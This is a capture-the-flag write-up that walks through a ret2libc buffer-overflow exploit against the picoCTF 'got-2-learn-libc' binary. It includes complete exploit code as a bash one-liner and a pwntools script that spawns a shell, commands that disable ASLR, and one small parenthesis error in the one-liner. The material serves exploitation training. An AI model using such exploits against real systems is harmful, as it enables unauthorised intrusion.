PicoCTF 2018 - got-2-learn-libc

Note: This article is part of our PicoCTF 2018 BinExp Guide.

Spot the Bug

Here’s the good news: If you remember buffer overflow 2 at all, you should be able to spot the bug.

void vuln(){
  char buf[BUFSIZE];
  puts("Enter a string:");
  gets(buf);  /* unbounded read into buf: this is the overflow */
  puts("Thanks! Exiting now...");
}


Here’s the bad news: There’s no easy win() function to call. Worse than that, this is our first taste of PIE.

$ checksec vuln
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

So, what exactly is PIE and why do we care? A position-independent executable is an executable made entirely from position-independent code. As a result, none of the addresses used by the code are absolute (i.e., all addresses are relative), and the dynamic loader is free to load the program and its libraries at random base addresses every time it executes (this is part of a security feature known as Address Space Layout Randomization, or ASLR). ASLR has been turned on by default in most Linux distributions for roughly 10 years now. In practice, it means that simple exploits become a lot more work because you don’t know where anything is in memory: it’s different from computer to computer, and it’s different every time the program executes.

In fact, even if your program itself isn’t compiled with PIE, if you use libc, then the libc portion is still loaded at a random base offset. This is important to know if you are attempting to call functions within the libc library.

If you run this program a couple of times, you’ll see different addresses for all the libc functions (puts, fflush, read, …) as well as for the “useful_string”.

$ ./vuln
Here are some useful addresses:

puts: 0xf761d150
fflush 0xf761b340
read: 0xf7692440
write: 0xf76924b0
useful_string: 0x565d1030

Enter a string:
$ ./vuln
Here are some useful addresses:

puts: 0xf759a150
fflush 0xf7598340
read: 0xf760f440
write: 0xf760f4b0
useful_string: 0x5664c030

Enter a string:
$ ./vuln
Here are some useful addresses:

puts: 0xf7660150
fflush 0xf765e340
read: 0xf76d5440
write: 0xf76d54b0
useful_string: 0x56624030

Enter a string:

Now, if you wanted to disable ASLR (which generally makes it easier to debug/develop your exploit), you have two options:

  1. Disable it globally by running echo 0 > /proc/sys/kernel/randomize_va_space as root (0 to disable, 2 to enable)
  2. Disable it on only a single process by running setarch $(uname -m) -R ./program (or skip the ./program argument to instead run a shell that launches every program without ASLR)

Generally, I use option 1 when attempting to understand a challenge, and code my exploit to never assume knowledge of any addresses. I then turn ASLR back on and verify everything works as expected.
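Before relying on either option, it can help to confirm what the kernel is currently doing. The snippet below is only a sketch: the helper names describe_aslr and read_aslr_setting are made up for this example, and it assumes a Linux system that exposes /proc/sys/kernel/randomize_va_space.

```python
from pathlib import Path

# Standard location of the setting on Linux.
ASLR_PATH = Path("/proc/sys/kernel/randomize_va_space")

# Meaning of the three values the kernel accepts.
ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, mmap, and shared libraries)",
    2: "full (also randomizes the heap)",
}


def describe_aslr(value):
    """Translate the numeric setting into a human-readable description."""
    return ASLR_MODES.get(value, "unknown value %d" % value)


def read_aslr_setting(path=ASLR_PATH):
    """Return the current setting as an int, or None if it cannot be read."""
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    setting = read_aslr_setting()
    if setting is None:
        print("could not read", ASLR_PATH)
    else:
        print("ASLR is", describe_aslr(setting))
```

Running it before and after the echo or setarch command is a quick way to make sure you are debugging under the conditions you think you are.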

The overall strategy for this challenge is exactly the same as the other buffer-overflow challenges:

  1. Do a buffer overflow to overwrite the return address on the stack
  2. Call into a function that will either give us a flag or a shell.

The complication here, of course, is that there is no trivial win() function to call. However, we are using functions from libc, and libc is a big library. In fact, if you recall from the guide for shellcode, libc has an implementation of execve which we can use to launch a shell. Plus, you already figured out how to pass arguments to the called function in the guide for buffer overflow 2.

Ready for the challenge? It’s at /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33 on the shell server.

Background Info

We are now faced with two problems: firstly, we don’t know what exact version of libc this program uses (later challenges actually provide a copy of libc to use), and secondly, we don’t know what address to call.

However, if we solve the first problem, and we observe the output of the program carefully, we can solve the second problem.

There are two ways to figure out the version of libc the program is using: the “easy” way and the “hard” way. We’ll go through the “hard” way first, and then use the “easy” way to double-check our work.

Remember how the program output the addresses of libc functions like puts, fflush, and read? Well, that is actually some very useful information. The thing about ASLR is that it loads the entire library at a random offset, but it doesn’t move the bits and pieces of the library around. Therefore, the relative distance between puts and fflush (for instance) is the same no matter what address the library gets loaded at. Moreover, if we know a couple of those distances, we can compare against a library of common libc versions and see if any of them match. There is actually a handy-dandy little website that will do all of that for you: https://libc.blukat.me/.
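To convince yourself of this, you can check the three runs shown earlier. The sketch below uses only the addresses printed above; the helper names distances and page_offsets are invented for the example. It also prints the low 12 bits of each address, which stay fixed because the library base is page-aligned.

```python
# Addresses copied from the three runs of ./vuln shown earlier.
runs = [
    {"puts": 0xf761d150, "fflush": 0xf761b340, "read": 0xf7692440, "write": 0xf76924b0},
    {"puts": 0xf759a150, "fflush": 0xf7598340, "read": 0xf760f440, "write": 0xf760f4b0},
    {"puts": 0xf7660150, "fflush": 0xf765e340, "read": 0xf76d5440, "write": 0xf76d54b0},
]


def distances(run, anchor="puts"):
    """Distance of every symbol from the anchor symbol within one run."""
    return {name: addr - run[anchor] for name, addr in run.items()}


def page_offsets(run):
    """Low 12 bits of every address (unchanged by a page-aligned base)."""
    return {name: addr & 0xfff for name, addr in run.items()}


all_distances = [distances(run) for run in runs]
all_offsets = [page_offsets(run) for run in runs]

# Every run should agree, even though the absolute addresses differ.
assert all(d == all_distances[0] for d in all_distances)
assert all(o == all_offsets[0] for o in all_offsets)

for name in runs[0]:
    print("%-6s distance from puts: %#x, low 12 bits: %#05x"
          % (name, all_distances[0][name], all_offsets[0][name]))
```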

Looking back at the most recent output, we know puts was at 0xf7660150, fflush was at 0xf765e340, read was at 0xf76d5440, and write was at 0xf76d54b0.

Let’s put those values in and see what it gives us: … Hey, what do you know? Exactly one result: libc6-i386_2.23-0ubuntu11.2_amd64! It also gives us a download link, and you can click to see the offsets of all the symbols in the file. For now, let’s make note of two symbols: puts and execve.

Symbol Offset
puts 0x0005f150
execve 0x000af670

Doing a little math, we know that whatever the address of puts is, we can expect that execve is 0xaf670 - 0x5f150 = 0x50520 bytes higher. So if puts was at 0xf7660150, we would expect execve to be at 0xf7660150 + 0x50520 = 0xf76b0670. You can even put together a quick python one-liner to do this math for you:

$ echo "0xf7660150" | python -c 'import sys; print(hex(int(sys.stdin.readline(),0) + 0x50520))' 
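An equivalent way to think about the same arithmetic is to recover the libc base address first and then add the offset of whatever symbol you want. The following is a small sketch using the two offsets from the table above; the function names are hypothetical, and the page-alignment check is just a sanity test that the leak and the libc version agree.

```python
# Symbol offsets inside libc, taken from the table above.
PUTS_OFFSET = 0x5f150
EXECVE_OFFSET = 0xaf670


def libc_base_from_puts(leaked_puts):
    """Recover the libc load address from a leaked puts address."""
    base = leaked_puts - PUTS_OFFSET
    # Libraries are mapped on page boundaries, so a wrong libc guess
    # will usually show up here as a non-zero low 12 bits.
    if base & 0xfff:
        raise ValueError("base %#x is not page-aligned" % base)
    return base


def execve_address(leaked_puts):
    """Address of execve for the run in which puts was leaked."""
    return libc_base_from_puts(leaked_puts) + EXECVE_OFFSET


if __name__ == "__main__":
    leak = 0xf7660150  # puts from the most recent run above
    print("libc base:", hex(libc_base_from_puts(leak)))
    print("execve   :", hex(execve_address(leak)))
```

Working from the base makes it easy to look up additional symbols later without recomputing a separate difference for each one.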

NOTE: Since we actually have access to the binary on the shell server, we can also directly access the version of libc it is using - let’s double check that our “guesses” were right.

$ cd /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33
$ ldd vuln
        linux-gate.so.1 =>  (0xf76e3000)
        libc.so.6 => /lib32/libc.so.6 (0xf751d000)
        /lib/ld-linux.so.2 (0xf76e4000)
$ objdump -T /lib32/libc.so.6 | grep -E " puts$| execve$"
0005f150  w   DF .text  000001d0  GLIBC_2.0   puts
000af670  w   DF .text  00000026  GLIBC_2.0   execve
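If you would rather not read the offsets by eye, the objdump output is easy to parse. This is a minimal sketch that works on the two lines shown above, pasted in as a string; parse_symbol_offsets is a made-up helper, and it assumes the first column is the hex offset and the last column is the symbol name, as in this output.

```python
# The two lines printed by objdump -T above.
OBJDUMP_OUTPUT = """\
0005f150  w   DF .text  000001d0  GLIBC_2.0   puts
000af670  w   DF .text  00000026  GLIBC_2.0   execve
"""


def parse_symbol_offsets(text):
    """Map symbol name -> offset from objdump -T style lines."""
    offsets = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue  # skip blank or malformed lines
        try:
            offsets[fields[-1]] = int(fields[0], 16)
        except ValueError:
            continue  # first column was not a hex number
    return offsets


offsets = parse_symbol_offsets(OBJDUMP_OUTPUT)
delta = offsets["execve"] - offsets["puts"]
print("execve is %#x bytes after puts" % delta)
```

The offsets agree with what the website reported, so the 0x50520 distance holds for the libc on the shell server.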

Oh, and let’s not forget to check on the number of padding bytes:

; ...
sub    esp,0xc
lea    eax,[ebp-0x9c]
push   eax
call   5b0 <gets@plt>
add    esp,0x10

Since the buffer was 148 bytes, and 0x9c is 156, we can see there are 8 bytes of padding.
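The same arithmetic, written out as a short sketch. The constant names are invented for the example; the values come from the buffer size and the disassembly above, and the 4-byte saved ebp assumes the usual 32-bit stack frame.

```python
BUFSIZE = 148                 # size of buf, as stated above
BUF_OFFSET_FROM_EBP = 0x9c    # from "lea eax,[ebp-0x9c]"
SAVED_EBP_SIZE = 4            # 32-bit saved frame pointer

# Bytes the compiler left between the end of buf and the saved ebp.
padding = BUF_OFFSET_FROM_EBP - BUFSIZE

# Bytes to write before reaching the saved return address.
offset_to_return_address = BUF_OFFSET_FROM_EBP + SAVED_EBP_SIZE

print("padding:", padding)
print("offset to return address:", offset_to_return_address)
```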


Putting it all together, the write to the buffer should look like this:

  1. 156 bytes of don’t care
  2. 4 bytes overwriting preserved ebp (also don’t care)
  3. 4 bytes return address for vuln (&puts + 0x50520 == &execve)
  4. 4 bytes return address for execve (don’t care - execve will never return)
  5. 4 bytes arg1 (useful_string)
  6. 4 bytes arg2 (0 - linux specific hack)
  7. 4 bytes arg3 (0 - linux specific hack)

Or, in python:

import sys, re, struct

p32 = lambda x : struct.pack('<L',x) #python2 version - packs 32 bit integer into 4 little-endian bytes

# read first 9 lines from stdin, grab the values we care about
matches = re.findall(r'(puts|useful_string): (.+)', "".join([sys.stdin.readline() for x in range(9)]))

execve = int(matches[0][1],0) + 0x50520
binsh = int(matches[1][1],0)
print("U"*(156+4) + p32(execve) + "UUUU" + p32(binsh) + p32(0) + p32(0))

Let’s wrap that script in some bash magic to give us an interactive terminal and try it out at /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33 on the shell server:

/problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33$ FIFO="$(mktemp -d)/fifo"; mkfifo $FIFO; cat $FIFO - | ./vuln | tee >(python -c 'import sys, re, struct; p32 = lambda x : struct.pack('\''<L'\'',x); matches = re.findall(r'\''(puts|useful_string): (.+)'\'', "".join([sys.stdin.readline() for x in range(9)])); execve = int(matches[0][1],0) + 0x50520; binsh = int(matches[1][1],0); print("U"*(156+4) + p32(execve)) + "UUUU" + p32(binsh) + p32(0) + p32(0)' > $FIFO; sleep infinity)
Here are some useful addresses:

puts: 0xf75ec150
fflush 0xf75ea340
read: 0xf7661440
write: 0xf76614b0
useful_string: 0x565cb030

Enter a string:
Thanks! Exiting now...
cat flag.txt

This script runs ./vuln, parses the output, constructs a buffer overflow, sends it back through a named pipe to the input of ./vuln, which overflows the buffer and launches a shell, and then it starts reading from stdin so you have access to an interactive terminal.

Of course, all of this bash magic is getting a little complicated, so we can do the exact same thing a little more simply using pwntools.

#!/usr/bin/env python3
# ~/got2learnlibc_exploit.py

from pwn import *

context.update(arch='i386', os='linux')

p = process("./vuln")

p.recvuntil(b"puts: 0x")

# the program prints the address as hex text; convert it to an integer
puts = u32(unhex(p.recvline(keepends=False)), endian='big')
print("puts @ " + hex(puts))

execve = puts + 0x50520
print("execve @ " + hex(execve))

p.recvuntil(b"useful_string: 0x")
binsh = u32(unhex(p.recvline(keepends=False)), endian='big')

p.recvline_contains(b"Enter a string:")

payload = b''.join([b'U'*(156+4),  # padding up to and including saved ebp
    p32(execve),     # return address for vuln -> execve
    p32(0x55555555), # return address from execve (never used)
    p32(binsh),      # arg1
    p32(0x00),       # arg2
    p32(0x00)])      # arg3

print("payload: " + enhex(payload))

p.sendline(payload)
p.interactive()


/problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33$ python ~/got2learnlibc_exploit.py
[+] Starting local process './vuln': pid 140986
puts @ 0xf7662150
execve @ 0xf76b2670
payload: 5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555570266bf755555555302057560000000000000000
[*] Switching to interactive mode
$ ls
flag.txt  vuln    vuln.c
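If an exploit like this misbehaves, decoding the printed payload is a quick way to see what was actually sent. The sketch below unpacks the last 20 bytes of the payload hex shown above using only the standard library; decode_tail is a hypothetical helper, and the field names simply mirror the layout described earlier.

```python
import struct

# Last 20 bytes of the payload printed above, as hex.
PAYLOAD_TAIL_HEX = "70266bf755555555302057560000000000000000"


def decode_tail(tail_hex):
    """Unpack five little-endian 32-bit words from the end of the payload."""
    names = ("execve", "fake_return", "arg1", "arg2", "arg3")
    values = struct.unpack("<5L", bytes.fromhex(tail_hex))
    return dict(zip(names, values))


fields = decode_tail(PAYLOAD_TAIL_HEX)
for name, value in fields.items():
    print("%-12s %#010x" % (name, value))

# The first word should be exactly 0x50520 above the leaked puts address.
assert fields["execve"] - 0x50520 == 0xf7662150
```

Here the first word decodes to the execve address the script printed, and arg1 is the useful_string address leaked in that run.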

For the most part, we will be using pwntools for the remaining challenges. Head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.